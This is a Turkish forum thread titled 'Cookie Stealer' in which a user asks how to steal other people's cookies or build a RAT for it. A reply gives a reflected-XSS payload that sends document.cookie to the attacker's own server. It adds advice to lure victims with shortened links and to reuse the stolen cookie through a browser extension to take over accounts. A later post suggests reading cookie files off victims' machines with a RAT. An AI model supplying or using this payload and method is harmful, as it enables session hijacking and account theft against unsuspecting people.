Cookie Stealer

KeoAltidore · 25 Mar 2022

Merhaba, cookieler hakkında birazcik bilgi verebilir misiniz? Cookieleri nasıl çalabilirim? Veya bunun için bir rat yapabilir miyim?

Safak-Bey · 25 Mar 2022

Cokkie ler bir web sitesine kayıt olup hesabınıza girdikten sonra web site tarafından size özel atanan oturum bilgisidir ve bu bilgi dosyalara yazılır, bu sayede aynı web sayfasını ziyaret ettiğinizde bilgilerinizi yeniden girmeye gerek duymazsınız.

Hedefin Cokkie bilgisini çalmak için en basitinden XSS zafiyetinden yararlanabilirsiniz. Örnek olarak;
http ://vulnerable.webapp/index.php?name=<script>document.location="http: //kendiwebsunucumuz.com/cookie.php?c="+document.cookie;</script> gibi açıklı url ye javascript kodu girerseniz ve sosyal mühendislik ile bunu hedef kişiye atarsanız(link kısaltma ile inandırıcılık arttırılabilir). Hedef kişi linke tıkladığı zaman cookie bilgisini kendi sunucumuza aktarabiliriz. Elde edilen cookie bilgisini EditThisCookie adlı eklenti ile hedefin cookie bilgisini girerek hedef kişinin kullanıcı adı ve parolasına ihtiyaç duymadan hesaba erişebiliriz. Session Hijacking Saldırısını araştırabilirsiniz.

SHADOW GHOST · 25 Mar 2022

benim cerezleri caldılar zaten sinirliyim o konuda , bide tht de konu açıp beni banlattılar eski hesabımda yaptılar

KeoAltidore · 25 Mar 2022

SHADOW GHOST' Alıntı:
benim cerezleri caldılar zaten sinirliyim o konuda , bide tht de konu açıp beni banlattılar eski hesabımda yaptılar

Senin adına üzüldüm, ben daha çok milleti çalmak değil de test etmek denemek istiyorum. Bilgin var mı bu konu da?

Safak-Bey' Alıntı:
Cokkie ler bir web sitesine kayıt olup hesabınıza girdikten sonra web site tarafından size özel atanan oturum bilgisidir ve bu bilgi dosyalara yazılır, bu sayede aynı web sayfasını ziyaret ettiğinizde bilgilerinizi yeniden girmeye gerek duymazsınız.

Hedefin Cokkie bilgisini çalmak için en basitinden XSS zafiyetinden yararlanabilirsiniz. Örnek olarak;
http ://vulnerable.webapp/index.php?name=<script>document.location="http: //kendiwebsunucumuz.com/cookie.php?c="+document.cookie;</script> gibi açıklı url ye javascript kodu girerseniz ve sosyal mühendislik ile bunu hedef kişiye atarsanız(link kısaltma ile inandırıcılık arttırılabilir). Hedef kişi linke tıkladığı zaman cookie bilgisini kendi sunucumuza aktarabiliriz. Elde edilen cookie bilgisini EditThisCookie adlı eklenti ile hedefin cookie bilgisini girerek hedef kişinin kullanıcı adı ve parolasına ihtiyaç duymadan hesaba erişebiliriz. Session Hijacking Saldırısını araştırabilirsiniz.

Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?

SHADOW GHOST · 25 Mar 2022

@KeoAltidore saolasın

Safak-Bey · 25 Mar 2022

KeoAltidore' Alıntı:
Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?

Cookie ler metin dosyasında saklanır. Bu sebeple içerikleri görülebilir (bazı siteler şifreleyerek saklar). İnternette "cookies folder location in windows x" şeklinde aratarak cookie bilgilerinin saklandığı dosyaların dizinlerini bulabilir ve hedef sistemde de aynı yolu kullanarak bilgiler elde edilebilir.

Cookie Stealer

KeoAltidore

Üye

Safak-Bey

Safak-Bey

Uzman üye

SHADOW GHOST

Katılımcı Üye

KeoAltidore

Üye

SHADOW GHOST

Katılımcı Üye

Safak-Bey

Uzman üye

Sosyal medya sayfalarımız